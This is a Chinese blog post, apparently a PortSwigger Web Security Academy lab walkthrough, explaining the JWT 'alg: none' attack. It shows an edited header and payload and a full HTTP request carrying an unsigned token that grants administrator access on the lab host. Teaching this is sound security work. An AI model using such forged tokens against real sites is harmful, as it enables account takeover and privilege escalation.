6种常见的JWT Attack,绕过网站身份验证 - 2.JWT无签名

最新推荐文章于 2024-04-17 20:47:50 发布
最新推荐文章于 2024-04-17 20:47:50 发布
阅读量163 收藏 4
点赞数 5
文章标签: 安全 web安全 安全威胁分析 系统安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/raymond0820/article/details/137422167
版权

简介

JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。

JWT常见攻击手法有以下几种:

  1. 签名未验证
  2. JWT无签名
  3. 爆力破解对称式加密签名
  4. 用kid绕过对称式加密签名
  5. 用JWK绕过非对称式加密签名
  6. 用JKU绕过非对称式加密签名


关于JWT的介绍可参考json web token介绍

2.JWT无签名

网站接受没有签名的JWT,因此可以将alg改为none,一旦JWT没有签名机制,那就可以任意修改

举例来说,想用administrator身份存取/my-account功能,所以一样透过JWT editor将token修改为administrator。但因为目标网站有指定alg,所以任何内容的修改都会和签名不同,导致修改后的JWT无法使用

由于网站接受没有签名的JWT,因此只要把alg改成none即可把签名取消,如下

############## header ##############
{
    "kid": "4d65bce9-4436-44cf-8475-a297719c5281",
    "alg": "none"
}

############## payload ##############
{
    "iss": "portswigger",
    "sub": "administrator",
    "exp": 1656580618
}

重制token后,可以发现少了签名那段,将此请求送出即可用administrator身份访问/my-account

GET /my-account HTTP/1.1
Host: 0ab7006c03314ce7c0c42f88006d0081.web-security-academy.net
Cookie: session=eyJraWQiOiI0ZDY1YmNlOS00NDM2LTQ0Y2YtODQ3NS1hMjk3NzE5YzUyODEiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1ODA2MTh9.

 其他方法可参考

6种常见的JWT attack方法

Web Security Academy

牛的大腦-網站安全
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSON Web 令牌 (JWT)攻击_jwt payload 用户id
2401_83944596的博客
04-11 729
Jwtcrack 是一个用于暴力破解 JWT 签名的工具。它会尝试使用不同的算法、密钥和有效载荷来生成签名,并与目标 JWT 进行比较,以验证签名的有效性。它通常用于渗透测试安全评估,来检测弱 JWT 签名安全风险。Hashcat 是一个强大的密码破解工具,它主要用于破解哈希值(例如 MD5、SHA1 等哈希算法)的密码。对于 JWT,如果使用了对称加密算法(如 HS256),可以将 JWT签名部分(即哈希值)提取出来,然后使用 Hashcat 进行暴力破解。
JWT安全漏洞以及常见攻击方式
dzqxwzoe的博客
02-25 1086
JWT即Json WebToken的缩写,顾名思义,是Token的一。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。仅需要对该Token正确性进行校验即可,这就意味着基于token认证机制的应用,不需要去考虑用户在哪一台服务器登录了,为应用的扩展提供了便利。新技术带来便利的同时也会带来新的安全问题,如果JWT本身安全存在问题,那么整个身份认证机制就会得不到保障。JWT由三部分组成,类似于。
【网络安全 | 密码学】JWT基础知识及攻击方式详析
最新发布
等风来
04-17 897
JWT(Json Web Token)是一用于在网络应用之间安全地传输信息的开放标准。它通过将用户信息以JSON格式加密并封装在一个token中,然后将该token发送给服务端进行验证,从而实现身份验证和授权。
portswigger JWT attacks
weixin_63231007的博客
11-05 1431
通过 jwk header注入绕过身份验证 不同的是,这个 jku header注入多了一个漏洞利用服务器,因而我们可以通过 把 JWK set放到漏洞利用服务器上,然后通过往header里写入 "jku":"漏洞利用服务器url" 从而实现 jwk 注入到header里,有远程文件包含的味道。Hashcat 使用 wordlist 中的每个密钥对来自 JWT 的标头和有效负载进行签名,然后将生成的签名与来自服务器的原始签名进行比较。JWE 非常相似,只是令牌的实际内容是加密的,而不仅仅是编码的。
nimbus-jose-jwt-4.41.1-API文档-中文版.zip
06-26
赠送jar包:nimbus-jose-jwt-4.41.1.jar; 赠送原API文档:nimbus-jose-jwt-4.41.1-javadoc.jar; 赠送源代码:nimbus-jose-jwt-4.41.1-sources.jar; 赠送Maven依赖信息文件:nimbus-jose-jwt-4.41.1.pom; 包含...
authentication-jwt:使用JWT学习身份验证-Node.js-Express.js
04-30
使用JWT进行身份验证-Tuto使用Netninja播放列表身份 智威汤逊代表JSON Web令牌。定义身份验证路由路线方法公用事业/报名得到注册页面/登录得到登录页面/报名邮政在数据库中创建一个新用户/登录邮政验证当前用户/登出...
java-jwt.jar
08-27
实现Java web token JWT所需的jar包,java-jwt.3.3.0.jar,可用于登录验证
spring-security-jwt-1.0.10.RELEASE-API文档-中文版.zip
05-09
赠送jar包:spring-security-jwt-1.0.10.RELEASE.jar; 赠送原API文档:spring-security-jwt-1.0.10.RELEASE-javadoc.jar; 赠送源代码:spring-security-jwt-1.0.10.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
java-jwt-3.1.0.jar
04-28
java-jwt-3.1.0.jar
JAVA面试题分享五百二十五:JWT认证绕过的几基操
之乎者也·的博客
02-17 1389
在这情况下,攻击者就可以使用众所周知的秘密的单词列表来暴力破解服务器的加密密钥。JWE 也是一样的,只是令牌的实际内容是加密的,而不仅仅是编码的。由于我们知道/dev/null目录是一个空文件,kid的参数改为它后会导致服务器会使用该文件的内容来对JWT签名进行验证,所以我们签名的密钥就是空(Base64加密为`AA==`)如果攻击者生成自签名证书并使用相应的私钥创建伪造的令牌,并将“x5c”参数的值替换为新生成的证书并修改其他参数,即 n、e 和 x5t,那么基本上伪造的令牌将被接受由服务器。
【SpringSecurity+JWT单点登录,跳过密码校验】
m0_44976351的博客
05-15 1628
https://blog.csdn.net/z69183787/article/details/113717614
Apache ShenYu JWT认证缺陷绕过漏洞 (CVE-2021-37580)
m0_58687645的博客
12-31 368
0x00 漏洞详情 Apache ShenYu(原名 Soul)是一个异步的、跨语言的、多协议的高性能响应式API 网关,并可应用于所有微服务场景。 2021 年 11 月 16日,Apache发布安全公告,公开了Apache ShenYu中的一个身份验证绕过漏洞(CVE-2021-37580),该漏洞的CVSS评分为9.8。由于ShenyuAdminBootstrap中JWT的错误使用,导致攻击者可以绕过身份验证,直接进入目标系统后台。 0x01 影响范围 Apache ShenYu 2.3.0
json web token(JWT绕过
向阳-Y.的博客
03-16 4780
前期准备 本次试验用到靶场WebGoat,如何安装WebGoat? Broken authentication——JWT tokens的第五题,首先随便切换一个用户,例如Tom,再点击删除图标,进行抓包。 抓到的包如下图 将其中的JWT值取出来,放到JWT在线解密平台上 这里分为了三个部分,头部,声明,签名(分别对应红、紫、蓝),签名出需要秘钥进行加密,但我们没有秘钥应该如何绕过呢? JWT绕过 1.将头部信息的alg值改为none,并进行base64加密 2.将声明部分的admin值改为true
记一次由JWT导致的绕过权限
qq_44029310的博客
11-01 915
记一次由JWT导致的绕过权限,以下相关链接均为随意编造的。
细说——JWT攻击
LainWith的博客
01-05 5225
JSON Web Token (JWT) 是一标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户信息的声明,作为身份验证、会话处理和访问控制机制的一部分。与经典会话令牌不同,服务器需要的所有数据都存储在 JWT 本身的客户端中。这使得 JWT 成为高度分布式网站的热门选择,在这些网站中,用户需要与多个后端服务器无缝交互。它一般会放置在、**Cookie**或者请求体里面。
JWT原理及常见攻击方式
weixin_57048716的博客
11-20 1678
JWT分别由标头(Header)、有效载荷(Payload)和签名(Signature)三个部分组成,采用base64url编码进行加密,以.作为连接的字符串形式。 //base64url编码加密是先做base64加密,然后再将+改成-、/改成_,同时也去除末尾额外添加的=字符 例如: 可以在官网上进行解密查看内容:JSON Web Tokens - jwt.io Header header部分承载两部分信息: 一个是typ,表示令牌类型 一个是alg,表示签名所使用的算
JWT 简介
weixin_34221276的博客
03-29 91
JWT 代替传统Token JSON Web Token (JWT)是由Auth0所提构出的一个新Token想法,这并不是一套软件、也不是一个技术,如果你在做网站时有用Token验证使用者身份的习惯,那么这个方法你应该很快就能上手。我们先来讲一讲为什么JWT会比传统Token要好。 在传统网站中我们会以Session 来判定使用者是否有登入,由于Session 只会被服务端知道,所以我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值